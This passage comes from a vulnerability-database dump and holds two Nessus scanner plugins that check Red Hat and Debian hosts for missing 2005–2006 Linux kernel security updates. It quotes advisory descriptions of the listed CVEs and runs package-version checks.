network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a flaw in remap_page_range() with O_DIRECT writes that\n allowed a local user to cause a denial of service\n (crash) (CVE-2004-1057, important)\n\n - a flaw in exec() handling on some 64-bit architectures\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-2708, important)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in IPv6 network UDP port hash table lookups that\n allowed a local user to cause a denial of service (hang)\n (CVE-2005-2973, important)\n\n - a flaw in 32-bit-compat handling of the TIOCGDEV ioctl\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3044, important)\n\n - a network buffer info leak using the orinoco driver that\n allowed a remote user to possibly view uninitialized\n data (CVE-2005-3180, important)\n\n - a flaw in IPv4 network TCP and UDP netfilter handling\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3275, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\n - a flaw in network ICMP processing that allowed a local\n user to cause a denial of service (memory exhaustion)\n (CVE-2005-3848, important)\n\n - a flaw in file lease time-out handling that allowed a\n local user to cause a denial of service (log file\n overflow) (CVE-2005-3857, moderate)\n\n - a flaw in network IPv6 xfrm handling that allowed a\n local user to cause a denial of service (memory\n exhaustion) (CVE-2005-3858, important)\n\nAll Red Hat Enterprise Linux 3 users are advised to upgrade their\nkernels to the packages associated with their machine architecture and\nconfigurations as listed in this erratum.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2002-2185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-1057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3848\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3858\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0140\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-BOOT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2002-2185\", \"CVE-2004-1057\", \"CVE-2005-2708\", \"CVE-2005-2709\", \"CVE-2005-2973\", \"CVE-2005-3044\", \"CVE-2005-3180\", \"CVE-2005-3275\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2006:0140\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0140\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"kernel-BOOT-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-doc-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-hugemem-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-hugemem-unsupported-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-smp-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"x86_64\", reference:\"kernel-smp-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-smp-unsupported-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"x86_64\", reference:\"kernel-smp-unsupported-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-source-2.4.21-37.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-unsupported-2.4.21-37.0.1.EL\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-BOOT / kernel-doc / kernel-hugemem / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:44:31", "description": "Several local and remote vulnerabilities have been discovered in the\nLinux kernel that may lead to a denial of service or the execution of\narbitrary code. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2004-1017\n Multiple overflows exist in the io_edgeport driver which\n might be usable as a denial of service attack vector.\n\n - CVE-2005-0124\n Bryan Fulton reported a bounds checking bug in the\n coda_pioctl function which may allow local users to\n execute arbitrary code or trigger a denial of service\n attack.\n\n - CVE-2005-0449\n An error in the skb_checksum_help() function from the\n netfilter framework has been discovered that allows the\n bypass of packet filter rules or a denial of service\n attack.\n\n - CVE-2005-2457\n Tim Yamin discovered that insufficient input validation\n in the zisofs driver for compressed ISO file systems\n allows a denial of service attack through maliciously\n crafted ISO images.\n\n - CVE-2005-2490\n A buffer overflow in the sendmsg() function allows local\n users to execute arbitrary code.\n\n - CVE-2005-2555\n Herbert Xu discovered that the setsockopt() function was\n not restricted to users/processes with the CAP_NET_ADMIN\n capability. This allows attackers to manipulate IPSEC\n policies or initiate a denial of service attack. \n\n - CVE-2005-2709\n Al Viro discovered a race condition in the /proc\n handling of network devices. A (local) attacker could\n exploit the stale reference after interface shutdown to\n cause a denial of service or possibly execute code in\n kernel mode.\n\n - CVE-2005-2800\n Jan Blunck discovered that repeated failed reads of\n /proc/scsi/sg/devices leak memory, which allows a denial\n of service attack.\n\n - CVE-2005-2973\n Tetsuo Handa discovered that the udp_v6_get_port()\n function from the IPv6 code can be forced into an\n endless loop, which allows a denial of service attack.\n\n - CVE-2005-3044\n Vasiliy Averin discovered that the reference counters\n from sockfd_put() and fput() can be forced into\n overlapping, which allows a denial of service attack\n through a NULL pointer dereference.\n\n - CVE-2005-3053\n Eric Dumazet discovered that the set_mempolicy() system\n call accepts a negative value for its first argument,\n which triggers a BUG() assert. This allows a denial of\n service attack.\n\n - CVE-2005-3055\n Harald Welte discovered that if a process issues a USB\n Request Block (URB) to a device and terminates before\n the URB completes, a stale pointer would be\n dereferenced. This could be used to trigger a denial of\n service attack.\n\n - CVE-2005-3180\n Pavel Roskin discovered that the driver for Orinoco\n wireless cards clears its buffers insufficiently. This\n could leak sensitive information into user space.\n\n - CVE-2005-3181\n Robert Derr discovered that the audit subsystem uses an\n incorrect function to free memory, which allows a denial\n of service attack.\n\n - CVE-2005-3257\n Rudolf Polzer discovered that the kernel improperly\n restricts access to the KDSKBSENT ioctl, which can\n possibly lead to privilege escalation.\n\n - CVE-2005-3356\n Doug Chapman discovered that the mq_open syscall can be\n tricked into decrementing an internal counter twice,\n which allows a denial of service attack through a kernel\n panic.\n\n - CVE-2005-3358\n Doug Chapman discovered that passing a zero bitmask to\n the set_mempolicy() system call leads to a kernel panic,\n which allows a denial of service attack.\n\n - CVE-2005-3783\n The ptrace code using CLONE_THREAD didn't use the thread\n group ID to determine whether the caller is attaching to\n itself, which allows a denial of service attack.\n\n - CVE-2005-3784\n The auto-reaping of child processes functionality\n included ptraced-attached processes, which allows denial\n of service through dangling references.\n\n - CVE-2005-3806\n Yen Zheng discovered that the IPv6 flow label code\n modified an incorrect variable, which could lead to\n memory corruption and denial of service.\n\n - CVE-2005-3847\n It was discovered that a threaded real-time process,\n which is currently dumping core can be forced into a\n dead-lock situation by sending it a SIGKILL signal,\n which allows a denial of service attack. \n\n - CVE-2005-3848\n Ollie Wild discovered a memory leak in the\n icmp_push_reply() function, which allows denial of\n service through memory consumption.\n\n - CVE-2005-3857\n Chris Wright discovered that excessive allocation of\n broken file lock leases in the VFS layer can exhaust\n memory and fill up the system logging, which allows\n denial of service.\n\n - CVE-2005-3858\n Patrick McHardy discovered a memory leak in the\n ip6_input_finish() function from the IPv6 code, which\n allows denial of service.\n\n - CVE-2005-4605\n Karl Janmar discovered that a signedness error in the\n procfs code can be exploited to read kernel memory,\n which may disclose sensitive information.\n\n - CVE-2005-4618\n Yi Ying discovered that sysctl does not properly enforce\n the size of a buffer, which allows a denial of service\n attack.\n\n - CVE-2006-0095\n Stefan Rompf discovered that dm_crypt does not clear an\n internal struct before freeing it, which might disclose\n sensitive information.\n\n - CVE-2006-0096\n It was discovered that the SDLA driver's capability\n checks were too lax for firmware upgrades.\n\n - CVE-2006-0482\n Ludovic Courtes discovered that get_compat_timespec()\n performs insufficient input sanitizing, which allows a\n local denial of service attack.\n\n - CVE-2006-1066\n It was discovered that ptrace() on the ia64 architecture\n allows a local denial of service attack, when preemption\n is enabled.", "edition": 28, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1017-1 : kernel-source-2.6.8 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-3358", "CVE-2006-0096", "CVE-2005-3181", "CVE-2005-3858", "CVE-2005-0124", "CVE-2005-2490", "CVE-2006-1066", "CVE-2005-3356", "CVE-2005-3053", "CVE-2005-4618", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-2800", "CVE-2004-1017", "CVE-2005-4605", "CVE-2005-2709", "CVE-2006-0095", "CVE-2006-0482", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3847", "CVE-2005-0449", "CVE-2005-3857", "CVE-2005-3055", "CVE-2005-2555"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:kernel-source-2.6.8"], "id": "DEBIAN_DSA-1017.NASL", "href": "https://www.tenable.com/plugins/nessus/22559", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1017. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22559);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-1017\", \"CVE-2005-0124\", \"CVE-2005-0449\", \"CVE-2005-2457\", \"CVE-2005-2490\", \"CVE-2005-2555\", \"CVE-2005-2709\", \"CVE-2005-2800\", \"CVE-2005-2973\", \"CVE-2005-3044\", \"CVE-2005-3053\", \"CVE-2005-3055\", \"CVE-2005-3180\", \"CVE-2005-3181\", \"CVE-2005-3257\", \"CVE-2005-3356\", \"CVE-2005-3358\", \"CVE-2005-3783\", \"CVE-2005-3784\", \"CVE-2005-3806\", \"CVE-2005-3847\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\", \"CVE-2005-4605\", \"CVE-2005-4618\", \"CVE-2006-0095\", \"CVE-2006-0096\", \"CVE-2006-0482\", \"CVE-2006-1066\");\n script_xref(name:\"DSA\", value:\"1017\");\n\n script_name(english:\"Debian DSA-1017-1 : kernel-source-2.6.8 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several local and remote vulnerabilities have been discovered in the\nLinux kernel that may lead to a denial of service or the execution of\narbitrary code. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2004-1017\n Multiple overflows exist in the io_edgeport driver which\n might be usable as a denial of service attack vector.\n\n - CVE-2005-0124\n Bryan Fulton reported a bounds checking bug in the\n coda_pioctl function which may allow local users to\n execute arbitrary code or trigger a denial of service\n attack.\n\n - CVE-2005-0449\n An error in the skb_checksum_help() function from the\n netfilter framework has been discovered that allows the\n bypass of packet filter rules or a denial of service\n attack.\n\n - CVE-2005-2457\n Tim Yamin discovered that insufficient input validation\n in the zisofs driver for compressed ISO file systems\n allows a denial of service attack through maliciously\n crafted ISO images.\n\n - CVE-2005-2490\n A buffer overflow in the sendmsg() function allows local\n users to execute arbitrary code.\n\n - CVE-2005-2555\n Herbert Xu discovered that the setsockopt() function was\n not restricted to users/processes with the CAP_NET_ADMIN\n capability. This allows attackers to manipulate IPSEC\n policies or initiate a denial of service attack. \n\n - CVE-2005-2709\n Al Viro discovered a race condition in the /proc\n handling of network devices. A (local) attacker could\n exploit the stale reference after interface shutdown to\n cause a denial of service or possibly execute code in\n kernel mode.\n\n - CVE-2005-2800\n Jan Blunck discovered that repeated failed reads of\n /proc/scsi/sg/devices leak memory, which allows a denial\n of service attack.\n\n - CVE-2005-2973\n Tetsuo Handa discovered that the udp_v6_get_port()\n function from the IPv6 code can be forced into an\n endless loop, which allows a denial of service attack.\n\n - CVE-2005-3044\n Vasiliy Averin discovered that the reference counters\n from sockfd_put() and fput() can be forced into\n overlapping, which allows a denial of service attack\n through a NULL pointer dereference.\n\n - CVE-2005-3053\n Eric Dumazet discovered that the set_mempolicy() system\n call accepts a negative value for its first argument,\n which triggers a BUG() assert. This allows a denial of\n service attack.\n\n - CVE-2005-3055\n Harald Welte discovered that if a process issues a USB\n Request Block (URB) to a device and terminates before\n the URB completes, a stale pointer would be\n dereferenced. This could be used to trigger a denial of\n service attack.\n\n - CVE-2005-3180\n Pavel Roskin discovered that the driver for Orinoco\n wireless cards clears its buffers insufficiently. This\n could leak sensitive information into user space.\n\n - CVE-2005-3181\n Robert Derr discovered that the audit subsystem uses an\n incorrect function to free memory, which allows a denial\n of service attack.\n\n - CVE-2005-3257\n Rudolf Polzer discovered that the kernel improperly\n restricts access to the KDSKBSENT ioctl, which can\n possibly lead to privilege escalation.\n\n - CVE-2005-3356\n Doug Chapman discovered that the mq_open syscall can be\n tricked into decrementing an internal counter twice,\n which allows a denial of service attack through a kernel\n panic.\n\n - CVE-2005-3358\n Doug Chapman discovered that passing a zero bitmask to\n the set_mempolicy() system call leads to a kernel panic,\n which allows a denial of service attack.\n\n - CVE-2005-3783\n The ptrace code using CLONE_THREAD didn't use the thread\n group ID to determine whether the caller is attaching to\n itself, which allows a denial of service attack.\n\n - CVE-2005-3784\n The auto-reaping of child processes functionality\n included ptraced-attached processes, which allows denial\n of service through dangling references.\n\n - CVE-2005-3806\n Yen Zheng discovered that the IPv6 flow label code\n modified an incorrect variable, which could lead to\n memory corruption and denial of service.\n\n - CVE-2005-3847\n It was discovered that a threaded real-time process,\n which is currently dumping core can be forced into a\n dead-lock situation by sending it a SIGKILL signal,\n which allows a denial of service attack. \n\n - CVE-2005-3848\n Ollie Wild discovered a memory leak in the\n icmp_push_reply() function, which allows denial of\n service through memory consumption.\n\n - CVE-2005-3857\n Chris Wright discovered that excessive allocation of\n broken file lock leases in the VFS layer can exhaust\n memory and fill up the system logging, which allows\n denial of service.\n\n - CVE-2005-3858\n Patrick McHardy discovered a memory leak in the\n ip6_input_finish() function from the IPv6 code, which\n allows denial of service.\n\n - CVE-2005-4605\n Karl Janmar discovered that a signedness error in the\n procfs code can be exploited to read kernel memory,\n which may disclose sensitive information.\n\n - CVE-2005-4618\n Yi Ying discovered that sysctl does not properly enforce\n the size of a buffer, which allows a denial of service\n attack.\n\n - CVE-2006-0095\n Stefan Rompf discovered that dm_crypt does not clear an\n internal struct before freeing it, which might disclose\n sensitive information.\n\n - CVE-2006-0096\n It was discovered that the SDLA driver's capability\n checks were too lax for firmware upgrades.\n\n - CVE-2006-0482\n Ludovic Courtes discovered that get_compat_timespec()\n performs insufficient input sanitizing, which allows a\n local denial of service attack.\n\n - CVE-2006-1066\n It was discovered that ptrace() on the ia64 architecture\n allows a local denial of service attack, when preemption\n is enabled.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=295949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=334113\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=330287\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=332587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=332596\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=330343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=330353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=327416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2004-1017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-0124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-0449\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2457\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2490\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2800\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3055\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3783\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3848\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3858\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-4605\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-4618\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0482\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1017\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the kernel package immediately and reboot the machine. If you\nhave built a custom kernel from the kernel source package, you will\nneed to rebuild to take advantage of these fixes.\n\nThe following matrix explains which kernel version for which\narchitecture fix the problems mentioned above :\n\n Debian 3.1 (sarge) \n Source 2.6.8-16sarge2 \n Alpha architecture 2.6.8-16sarge2 \n AMD64 architecture 2.6.8-16sarge2 \n HP Precision architecture 2.6.8-6sarge2 \n Intel IA-32 architecture 2.6.8-16sarge2 \n Intel IA-64 architecture 2.6.8-14sarge2 \n Motorola 680x0 architecture 2.6.8-4sarge2 \n PowerPC architecture 2.6.8-12sarge2 \n IBM S/390 architecture 2.6.8-5sarge2 \n Sun Sparc architecture 2.6.8-15sarge2 \nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update :\n\n Debian 3.1 (sarge) \n kernel-latest-2.6-alpha 101sarge1 \n kernel-latest-2.6-amd64 103sarge1 \n kernel-latest-2.6-hppa 2.6.8-1sarge1 \n kernel-latest-2.6-sparc 101sarge1 \n kernel-latest-2.6-i386 101sarge1 \n kernel-latest-powerpc 102sarge1 \n fai-kernels 1.9.1sarge1 \n hostap-modules-i386 0.3.7-1sarge1 \n mol-modules-2.6.8 0.9.70+2.6.8+12sarge1 \n ndiswrapper-modules-i386 1.1-2sarge1 \nThis update introduces a change in the kernel's binary interface, the\naffected kernel packages inside Debian have been rebuilt, if you're\nrunning local addons you'll need to rebuild these as well. Due to the\nchange in the package name you need to use apt-get dist-upgrade to\nupdate your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.6.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/12/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"fai-kernels\", reference:\"1.9.1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.4.27-3-386\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.4.27-3-586tsc\", reference:\"0.3.7-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"hostap-modules-2.4.27-3-686\", reference:\"0.3.7-1sarge1\")) flag++;\nif 